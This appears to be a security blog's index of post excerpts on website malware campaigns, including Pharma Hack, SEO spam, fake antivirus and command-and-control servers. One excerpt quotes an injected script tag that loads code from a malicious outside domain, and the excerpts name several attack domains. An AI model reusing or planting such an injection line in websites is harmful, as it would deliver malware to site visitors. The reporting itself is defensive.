Success Magazine Blog Hit With Malware
David Dede We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the…
Modx and the new gcounter.cn attack
Quick malware update. See all the latest ones here. We are seeing lately many sites running Modx that are infected with a malware getting loaded…
Malware update – ssl-validation.net
Quick malware update: The site ssl-validation.net (nice name) is being used to distribute SEO spam and malware (Rhe famous fake AV, say it ain’t so).…
Malware update – seconeo.com,secowo.com,etc
We will be posting some quick malware updates on our blog from now on. If your WordPress site got hacked with malware from any of…
Malware update – Alex Bodrov – awaue.com,etc
We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are…
Hilary Kneber (part XI) – sippa.dottasink.net
Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net: < script src = "http://sippa.dottasink.net/music/indi.php”></script>…
More spam: Google-traffic-analytics.com C&C server
We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled…
Gmail blacklisted by Spamhaus
Update: Gmail not blacklisted anymore. It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We…
Pharma hack and their C&C (Command & control) server
A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted…
Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group
If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost,…
Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)
Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar…